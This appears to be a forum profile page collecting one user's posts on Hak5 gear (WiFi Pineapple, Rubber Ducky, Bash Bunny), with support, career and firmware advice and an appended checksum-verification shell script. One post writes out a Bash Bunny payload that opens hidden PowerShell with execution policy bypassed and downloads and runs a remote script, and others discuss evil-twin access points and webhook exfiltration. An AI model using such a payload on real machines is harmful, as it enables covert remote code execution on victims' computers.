dark_pyrro

Dedicated Members
  • Posts: 2,571
  • Days Won: 194

Everything posted by dark_pyrro

  1. Same thing was asked on Discord, so I guess it's the same user
  2. If the networks/ESSIDs that the target devices are looking for are open networks, then you can spoof the ESSID and hope they will connect. If the networks are protected then you need to know the secret and set up the evil twin using that information. https://docs.hak5.org/wifi-pineapple/ui-overview/pineap#impersonation
  3. OK, I understand.

     That, however, doesn't convert anything to DuckyScript as I see it. So my question remains; what tool are you using to encode the DuckyScript code to an inject.bin file that the Ducky can execute?

     That doesn't really answer my question about if the keyboard language used when encoding the DuckyScript payload is corresponding to the keyboard language used by the intended target. So, is the target Windows computer using a US keyboard layout? From what I can tell by looking at the output posted, it seems as if line feeds aren't handled correctly. That's why I'm asking about keyboard layouts. It doesn't really look like that might be the issue, but I have to ask to rule that out of it all.

     And my last question; are you using a true/original/official Hak5 USB Rubber Ducky (first generation) when doing all of this?
  4. Just to be sure; as I see it, it's not the Ducky script that is encoded with base64, it's the PowerShell code/script. What are you using to encode the Ducky script itself into an inject.bin? Are you using a language when encoding that corresponds with the target keyboard language (if not US)? BTW, both your screenshot and the included base64 code are exposing a Discord webhook. If it's your webhook then that should perhaps be removed if you don't want to share it.
  5. That sounds sus. Writing it that way is a sign of not being in ownership (or allowed by the owner) of the networks being attacked. Keep it legal if discussed here.
  6. I wouldn't worry that much about the specs with such requirements. Just install it and run it and you'll figure out when the hardware is the limiting factor. Using the RPi you mention will most likely be just fine to start with if just using very few devices that aren't that active. The same thing goes with the scenario if scaling things up, just test with what hardware you have available. And, if planning for 20-30 devices, you need to step up from the free community version and buy the Professional version, and in that case you should have access to standard support (not just community support) and can most likely ask official support about any hardware setup suggestions depending on your use case scenario.
  7. Are you running other modules in the Pineapple or is HTTPeek the only one? I have never had any issues using that module, although I haven't had any real reason to use it since it's quite (or, very) limited in its scope. When saying "interfaces", I assume that you refer to network interfaces, such as wlan0, wlan0-1, wlan1, wlan2, and so on?
  8. Why do you need more definitive numbers? It's easier to provide some kind of opinion if you're more specific about your needs (version of C2 that you plan to use, how many devices are you going to attach to the C2 server, if it's any kind of exfiltration scenario; what amounts of data is going to be extracted from devices to the C2 server in a specific time unit, any specific hardware that you already have plans to run it on and if so what specs does that hardware feature, etc, etc).
  9. dark_pyrro

    Beginner

    I have to say... I almost never ever read books when it comes to cybersec. I have quite a few for sure, but I always revert to things online. It's the natural way to learn for me and has always been from the point in time when internet was a relevant source of information (in my case since the beginning of the 90's even though it was far from what it is today in terms of available information).

    One way to do it (at least the way I would do it) is to decide what area of knowledge you want to focus on and then start to study hard, either it'd be web, Windows environments, OT, or whatever. If you want to buy books, then go ahead. And/or use web resources such as articles, white papers, CTF oriented web sites, etc.

    Also, try not to focus that much on the hacking perspective at first. Try to be good at the tech that is used, then you'd be a much better pen tester (or whatever area you want to enter in the cybersec realm). If you know web, you will be a much better "red teamer". If you have Windows environments in mind as future targets in customer engagements, then become good at Windows (client/server), AD, networking, etc. etc.

    The most recent list of books focusing on "hacking" that I've seen is the one posted on YouTube by Bombal. I have no idea if it's good quality or not. https://www.youtube.com/watch?v=r0P5vLcXpjY
  10. After doing a factory reset/firmware recovery (according to the procedure described in the documentation), download the latest upgrade file from the Hak5 downloads web site and verify its SHA256 checksum, then:

      • scp the upgrade to your Pineapple's /tmp directory
      • ssh into the Pineapple and enter the /tmp directory (verifying the sha256sum locally on the Pineapple as well isn't a bad idea, just to be sure)
      • Execute: splitweb /tmp/upgrade.bin (or whatever firmware filename that has been downloaded)
      • Then run: sysupgrade -n /tmp/upgrade.bin

      You do the above at your own risk. I'd suggest submitting a support ticket if you want to get official assistance on what to do.
  11. As I understand it, there are infrastructural changes being made to the platform facilitating the awards including a new voting mechanism. It will be announced when ready.
  12. Read the documentation of the tools available and you will get an understanding of what's possible or not.

      Well, just configuring an "evil twin" to use the same ESSID won't make any target device auto-connect to your fake AP if you don't already know the passphrase for that network.

      Not sure what you mean here. In what way does the MAC address affect it all?
  13. Some users got Squirrels that didn't have the correct firmware flashed from factory, but that was really early, even before it was officially released. Not at all sure if this is the case here, but I would suggest submitting a support ticket to get assistance.
  14. Perhaps some of the official EU resellers will ship to that country. Not sure what restrictions might be in place between EU and Israel though. Email them and ask.
  15. It doesn't really matter where you begin if you don't know what you want to focus on when it comes to cybersec. Just like in AiW; "If you don't know where you're going, any road will take you there." It's such a large area of expertise that you have to focus on certain areas, you will most likely not be able to cover all of it anyway. Also select topics to develop knowledge in from any tech environments that the potential customers and engagements are most likely to be using.

      I think that the very base of things is to be good at the tech itself (and the business supported by the tech used). If you don't know OS:es, scripting, programming, networking, AD, etc. etc. chances are that you won't be very good at doing cybersec related stuff. You have to understand all the "layers" to be successful. Don't start with the "hacking" perspective. Start with using computers and what surrounds them. That's what you need to learn to be good at cybersec things.

      Kali, BlackArch, or whatever doesn't really matter as I see it. Some things will be a bit easier for sure since tools are available/installed, but you could use almost any OS/distro and add what's needed at each given moment. I most often use Kali when I feel the need for it, but is it because it's the best distro...? I haven't evaluated that at all and I don't feel that there's any need for it. Just spin up anything and use it.

      Selecting a programming language to learn just to create tools isn't something that I think you should focus on at this stage. If you've reached the point when you are skilled at such a level that you are developing your own tools, you know by your own experience what to use and that situation is not what you are in right now. Leave that for the future (if you ever need to get there).

      You also have a dedicated thread that is pinned to the top of this section of the forums that deals with the subject.
  16. There's always the official documentation. I'd suggest reading all of it. https://docs.hak5.org/bash-bunny/
  17. Something like this

          ATTACKMODE HID
          QUACK DELAY 3000
          QUACK GUI r
          QUACK DELAY 500
          QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl
          QUACK ENTER

      Perhaps also wrap the powershell line in quote marks and escape the dollar char as well

          QUACK STRING "powershell -w h -NoP -NonI -ep Bypass \$pl = iwr 'https://redacted.site/pl.ps1'; iex \$pl"
  18. Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny.
  19. It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add ATTACKMODE HID to the top of the payload file.

      To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny.

      However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.
  20. What payloads are you using in each switch position?
  21. https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii#storage
  22. I can't answer to how quality checks are made in the factory before delivery. You have to ask Hak5 about that, but I'm pretty sure it's not a situation they want.
  23. Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny? Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.
  24. Even if 1.1.1 works fine, there's still a potentially faulty flash storage device, and you don't want that. Just because you're running 1.1.1 doesn't make it go away, it's still there. https://hak5.customerdesk.io/
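
Added example (not part of any post above, and not Hak5 code): a checksum gate for the Pineapple firmware procedure in the post that starts "After doing a factory reset/firmware recovery", usable both on the workstation and again on the device before `sysupgrade -n`. The function names `fw_digest` and `verify_fw` are hypothetical, and the expected SHA256 value has to be copied from the vendor's download page since none is given here.

```sh
#!/bin/sh
# Added example: refuse to continue a firmware flash unless the image's
# SHA256 matches the value published by the vendor.
# Assumption: sha256sum is available (the post mentions running it on the device).

# Print the lowercase SHA256 hex digest of a file; return 2 if it cannot be read.
fw_digest() {
    [ -f "$1" ] && [ -r "$1" ] || return 2
    # Read via stdin so odd filenames cannot change sha256sum's output format.
    sha256sum < "$1" | cut -d' ' -f1 | tr 'A-F' 'a-f'
}

# verify_fw FILE EXPECTED
# Returns 0 on match, 1 on mismatch, 2 if FILE is missing or unreadable,
# 3 if EXPECTED is not a 64-character hex string (e.g. truncated copy/paste).
verify_fw() {
    file=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    case $expected in
        *[!0-9a-f]*) return 3 ;;
    esac
    [ "${#expected}" -eq 64 ] || return 3
    actual=$(fw_digest "$file") || return 2
    [ "$actual" = "$expected" ] || return 1
    return 0
}

# Usage: sh verify_fw.sh /tmp/upgrade.bin <sha256 from the download page>
if [ "$#" -eq 2 ]; then
    if verify_fw "$1" "$2"; then
        echo "OK: checksum matches, continue with the upgrade steps"
    else
        echo "STOP: verification failed (code $?), do not flash" >&2
        exit 1
    fi
fi
```

Running it once after download and once after the scp catches both a bad download and a transfer that was cut short or landed on a failing flash device.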